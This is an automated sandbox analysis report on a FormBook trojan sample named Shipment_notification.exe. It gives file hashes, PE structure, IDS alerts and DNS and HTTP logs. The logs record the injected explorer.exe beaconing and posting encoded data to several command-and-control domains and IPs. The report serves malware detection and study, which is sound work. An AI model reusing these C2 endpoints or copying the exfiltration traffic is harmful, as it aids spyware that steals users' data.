Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: Shipment_notification.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/3@12/7
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 66.3% (good quality ratio 58.6%)
                                                                              • Quality average: 70.8%
                                                                              • Quality standard deviation: 33.1%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 56
                                                                              • Number of non-executed functions: 127
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              Time | Type | Description
                                                                              16:48:55 | API Interceptor | 1x Sleep call for process: Shipment_notification.exe modified
                                                                              16:49:00 | API Interceptor | 838x Sleep call for process: explorer.exe modified
                                                                              Process:C:\Users\user\Desktop\Shipment_notification.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.355304211458859
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                              Malicious:true
                                                                              Reputation:high, very likely benign file
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):984
                                                                              Entropy (8bit):5.2414849034866355
                                                                              Encrypted:false
                                                                              SSDEEP:24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
                                                                              MD5:4816271302882BDFB06EE40F624169D1
                                                                              SHA1:A8F07F0A5940C4A9D4DAD112787FE109CCACA869
                                                                              SHA-256:26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
                                                                              SHA-512:3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}
                                                                              Process:C:\Windows\SysWOW64\control.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):94208
                                                                              Entropy (8bit):1.287139506398081
                                                                              Encrypted:false
                                                                              SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                              MD5:292F98D765C8712910776C89ADDE2311
                                                                              SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                              SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                              SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                              Malicious:false
                                                                              Preview:SQLite format
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.8691620331810155
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:Shipment_notification.exe
                                                                              File size:772096
                                                                              MD5:c310a64af890ac32abff89e86cb53a33
                                                                              SHA1:509cdec4d058011fb55535a936e56d3158f3f05a
                                                                              SHA256:90e86051c2fb04a3f6fda85273580abca9a9131fb5e32065f620c4410febe1af
                                                                              SHA512:095334ee039c7c70b5459b16f1e8d66b56cb7847d3769859182ef5764a8fcb6720cddbc20fc7b5a2c87a6ec4141a70b537e59e27f7fd2ff57c0c325e1b803fce
                                                                              SSDEEP:12288:PIrmYMUnFW/NObV55FbasbtrKnnRy50vHKB0otonixVtd/FmQSBhVa8i6NFJHKoR:PIrUUj5FbfVoy5hB0hnixT9FHI04qooW
                                                                              TLSH:1AF402206B975636F13523BD85E46296A77EB3A62B13C54D14F212CE1B23F0349D1A3F
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0.................. ........@.. ....................... ............@................................
                                                                              Icon Hash:209480e66eb84902
                                                                              Entrypoint:0x4bd0fa
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6417DEA8 [Mon Mar 20 04:18:48 2023 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbd0a8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbe000 | 0x1110 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbbc98 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbb100 | 0xbb200 | False | 0.9291656229124916 | data | 7.877600970637655 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbe000 | 0x1110 | 0x1200 | False | 0.7309027777777778 | data | 6.633661427958474 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc0000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xbe100 | 0xa79 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0xbeb8c | 0x14 | data | |
RT_VERSION | 0xbebb0 | 0x360 | data | |
RT_MANIFEST | 0xbef20 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/20/23-16:50:29.247456 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49706 | 80 | 192.168.2.5 | 198.177.124.57
03/20/23-16:50:05.917395 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49702 | 80 | 192.168.2.5 | 199.59.243.223
03/20/23-16:50:29.247456 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49706 | 80 | 192.168.2.5 | 198.177.124.57
03/20/23-16:50:21.020230 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49704 | 80 | 192.168.2.5 | 154.218.155.8
03/20/23-16:50:29.247456 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49706 | 80 | 192.168.2.5 | 198.177.124.57
03/20/23-16:50:21.020230 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49704 | 80 | 192.168.2.5 | 154.218.155.8
03/20/23-16:50:05.917395 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49702 | 80 | 192.168.2.5 | 199.59.243.223
03/20/23-16:50:21.020230 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49704 | 80 | 192.168.2.5 | 154.218.155.8
03/20/23-16:50:05.917395 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49702 | 80 | 192.168.2.5 | 199.59.243.223
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                              Mar 20, 2023 16:50:35.249876976 CET4970780192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:36.341392040 CET4970780192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:38.288278103 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:38.536365032 CET804970845.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:38.537643909 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:38.678186893 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:38.926736116 CET804970845.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:38.929861069 CET804970845.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:38.929925919 CET804970845.114.105.2192.168.2.5
                                                                              Mar 20, 2023 16:50:38.930274010 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:39.283489943 CET4970880192.168.2.545.114.105.2
                                                                              Mar 20, 2023 16:50:39.531642914 CET804970845.114.105.2192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 20, 2023 16:49:31.670409918 CET | 192.168.2.5 | 8.8.8.8 | 0xa49 | Standard query (0) | www.emagrecarapido.store | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:49:36.711066961 CET | 192.168.2.5 | 8.8.8.8 | 0xb396 | Standard query (0) | www.isabellagambitta.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:49:47.181622028 CET | 192.168.2.5 | 8.8.8.8 | 0x30a5 | Standard query (0) | www.drkathleensanders.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:49:55.184149027 CET | 192.168.2.5 | 8.8.8.8 | 0x94e6 | Standard query (0) | www.carcosainvest.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:03.326172113 CET | 192.168.2.5 | 8.8.8.8 | 0x35e6 | Standard query (0) | www.piergitarshoes.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:11.142652035 CET | 192.168.2.5 | 8.8.8.8 | 0x86ab | Standard query (0) | www.tcatelier.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:12.181365967 CET | 192.168.2.5 | 8.8.8.8 | 0xddc4 | Standard query (0) | www.tcatelier.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:17.231201887 CET | 192.168.2.5 | 8.8.8.8 | 0xccf9 | Standard query (0) | www.ywtxsm.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:26.343081951 CET | 192.168.2.5 | 8.8.8.8 | 0x51a6 | Standard query (0) | www.peramid.xyz | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:34.530338049 CET | 192.168.2.5 | 8.8.8.8 | 0xcf32 | Standard query (0) | www.locationsbormes.com | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:51.235682964 CET | 192.168.2.5 | 8.8.8.8 | 0xdeec | Standard query (0) | www.amirah.cfd | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:58.838778973 CET | 192.168.2.5 | 8.8.8.8 | 0x1301 | Standard query (0) | www.amirah.cfd | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 20, 2023 16:49:31.692192078 CET | 8.8.8.8 | 192.168.2.5 | 0xa49 | Name error (3) | www.emagrecarapido.store | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:49:36.748585939 CET | 8.8.8.8 | 192.168.2.5 | 0xb396 | No error (0) | www.isabellagambitta.com | | 185.27.134.217 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:49:47.295319080 CET | 8.8.8.8 | 192.168.2.5 | 0x30a5 | No error (0) | www.drkathleensanders.com | | 66.96.161.158 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:49:55.216954947 CET | 8.8.8.8 | 192.168.2.5 | 0x94e6 | No error (0) | www.carcosainvest.com | carcosainvest.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 16:49:55.216954947 CET | 8.8.8.8 | 192.168.2.5 | 0x94e6 | No error (0) | carcosainvest.com | | 206.54.190.30 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:03.350786924 CET | 8.8.8.8 | 192.168.2.5 | 0x35e6 | No error (0) | www.piergitarshoes.com | | 199.59.243.223 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:11.171879053 CET | 8.8.8.8 | 192.168.2.5 | 0x86ab | Name error (3) | www.tcatelier.com | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:12.202626944 CET | 8.8.8.8 | 192.168.2.5 | 0xddc4 | Name error (3) | www.tcatelier.com | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:17.255079031 CET | 8.8.8.8 | 192.168.2.5 | 0xccf9 | No error (0) | www.ywtxsm.com | | 154.218.155.8 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:26.362843990 CET | 8.8.8.8 | 192.168.2.5 | 0x51a6 | No error (0) | www.peramid.xyz | | 198.177.124.57 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:34.561840057 CET | 8.8.8.8 | 192.168.2.5 | 0xcf32 | No error (0) | www.locationsbormes.com | | 45.114.105.2 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:51.260627031 CET | 8.8.8.8 | 192.168.2.5 | 0xdeec | Name error (3) | www.amirah.cfd | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 16:50:58.860341072 CET | 8.8.8.8 | 192.168.2.5 | 0x1301 | Name error (3) | www.amirah.cfd | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49695 | 185.27.134.217 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 20, 2023 16:49:36.798851013 CET | 94 | OUT | GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.isabellagambitta.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
Mar 20, 2023 16:49:36.846508026 CET | 95 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:49:36 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 965
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                              Cache-Control: no-cache
                                                                              Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("ee5ca72ef5e4ae3bffd0f1aaefa9fb3d");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49697 | 66.96.161.158 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 20, 2023 16:49:47.409413099 CET | 109 | OUT | POST /rs5b/ HTTP/1.1
                                                                              Host: www.drkathleensanders.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.drkathleensanders.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.drkathleensanders.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
Mar 20, 2023 16:49:47.522320986 CET | 111 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 20 Mar 2023 15:49:47 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 867
                                                                              Connection: close
                                                                              Server: Apache/2
                                                                              Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                              Accept-Ranges: bytes
                                                                              Age: 0
                                                                              Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.5 | 49706 | 198.177.124.57 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 20, 2023 16:50:29.247456074 CET | 138 | OUT | GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.peramid.xyz
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
Mar 20, 2023 16:50:29.518753052 CET | 139 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 20 Mar 2023 15:50:29 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49707 | 45.114.105.2 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Mar 20, 2023 16:50:34.817869902 CET | 140 | OUT | POST /rs5b/ HTTP/1.1
                                                                              Host: www.locationsbormes.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.locationsbormes.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.locationsbormes.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Ascii: uyxvg=0lOPSpK_v5Pbk7(0gROWyeya7OgDyeYcWnXoVC5SvrvhNBa70LKWaX7z2cx21iBwYR5SO_rp6XqPhNCzinPAoVEaRAIwY-BT4AyBdr9fjjTRPemxUH~oNGK7ZIwbRhQ0~yaaB_wvA2gqBe4wfjpt~Ec1m4YXKLtP98yUPuWNrUzRESV3tA).
                                                                              Mar 20, 2023 16:50:35.249516010 CET | 141 | IN | HTTP/1.1 400 Bad Request
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:50:35 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Ascii: 1f7<!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              12 | 192.168.2.5 | 49708 | 45.114.105.2 | 80 | C:\Windows\explorer.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Mar 20, 2023 16:50:38.678186893 CET | 142 | OUT | GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.locationsbormes.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:50:38.929861069 CET | 142 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:50:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 1.0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              2 | 192.168.2.5 | 49698 | 66.96.161.158 | 80 | C:\Windows\explorer.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Mar 20, 2023 16:49:50.047743082 CET | 111 | OUT | GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.drkathleensanders.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:49:50.166798115 CET | 112 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 20 Mar 2023 15:49:50 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 867
                                                                              Connection: close
                                                                              Server: Apache/2
                                                                              Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                              Accept-Ranges: bytes
                                                                              Age: 0
                                                                              Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              3 | 192.168.2.5 | 49699 | 206.54.190.30 | 80 | C:\Windows\explorer.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Mar 20, 2023 16:49:55.363253117 CET | 114 | OUT | POST /rs5b/ HTTP/1.1
                                                                              Host: www.carcosainvest.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.carcosainvest.com
